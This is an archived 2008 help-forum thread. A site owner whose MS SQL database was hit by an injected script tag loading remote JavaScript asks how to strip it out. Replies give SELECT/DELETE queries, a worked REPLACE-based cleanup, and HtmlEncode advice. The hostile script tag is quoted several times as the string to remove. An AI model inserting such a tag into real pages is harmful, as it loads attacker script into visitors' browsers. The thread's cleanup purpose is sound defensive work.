Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
Last Modified: 2013-11-15
Here's the deal, some jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
Question by:bishopandsix
LVL 25

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
Hi!

Have you tried Toad for MySQL (www.toadsoft.com)?
It's a free and very good DBA tool to make changes to your database.

What you can do is do an update on each table and put an empty string instead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUMTEXT, LONGTEXT) or BLOB fields it might be a little trickier.
What you can do is use mysqldump to dump the database(s) to an SQL file, use a
text editor (like WordPad/Notepad if you use Windows) to search and replace the script text with blanks,
and then restore the database with the altered backup SQL file.
See the manual for further info:
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly?
0
 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
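An added worked example (not code from any poster in this thread) of the "loop through all records and strip the tag" approach Zippit describes, done in T-SQL for SQL Server 2005 or later with REPLACE so the rest of each field is kept. Table and column names (tbl_myComment_Table, str_text_field, txt_body) are placeholders; the payload is the string quoted in the question.

```sql
-- Added example, not from the thread. Placeholders: tbl_myComment_Table,
-- str_text_field (varchar) and txt_body (legacy TEXT). SQL Server 2005+.
DECLARE @payload varchar(200);
SET @payload = '<script src=http://www.clsidw.com/b.js></script>';

-- 1. Dry run: preview the rows that would change in one known table.
--    The payload contains no LIKE wildcards (% _ [ ]), so it is safe as-is.
SELECT *
FROM tbl_myComment_Table
WHERE str_text_field LIKE '%' + @payload + '%';

-- 2. Strip the injected tag in place, leaving the original text intact.
--    A transaction lets you roll back if the verification count is wrong.
BEGIN TRANSACTION;

UPDATE tbl_myComment_Table
SET str_text_field = REPLACE(str_text_field, @payload, '')
WHERE str_text_field LIKE '%' + @payload + '%';

SELECT COUNT(*) AS still_infected
FROM tbl_myComment_Table
WHERE str_text_field LIKE '%clsidw.com%';   -- expect 0 before you COMMIT

COMMIT TRANSACTION;   -- or ROLLBACK TRANSACTION if still_infected > 0

-- 3. Don't know which fields were hit? Generate one UPDATE per string column
--    of every base table from INFORMATION_SCHEMA, review the output, run it.
SELECT 'UPDATE [' + c.TABLE_SCHEMA + '].[' + c.TABLE_NAME + '] SET ['
     + c.COLUMN_NAME + '] = REPLACE([' + c.COLUMN_NAME + '], '''
     + REPLACE(@payload, '''', '''''') + ''', '''') WHERE ['
     + c.COLUMN_NAME + '] LIKE ''%clsidw.com/b.js%'';' AS cleanup_sql
FROM INFORMATION_SCHEMA.COLUMNS AS c
JOIN INFORMATION_SCHEMA.TABLES AS t
  ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
WHERE t.TABLE_TYPE = 'BASE TABLE'
  AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar');

-- 4. Legacy TEXT/NTEXT columns do not accept REPLACE directly; cast through
--    varchar(max) and back.
UPDATE tbl_myComment_Table
SET txt_body = CAST(REPLACE(CAST(txt_body AS varchar(max)), @payload, '') AS text)
WHERE CAST(txt_body AS varchar(max)) LIKE '%' + @payload + '%';
```

Take a fresh backup before step 2, and re-run the step 1 SELECT against the generated statements' tables afterwards to confirm the count is zero.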
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said than done.
0
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
What product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no idea what product. I'll get with my host in the morning and ask.
0
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0
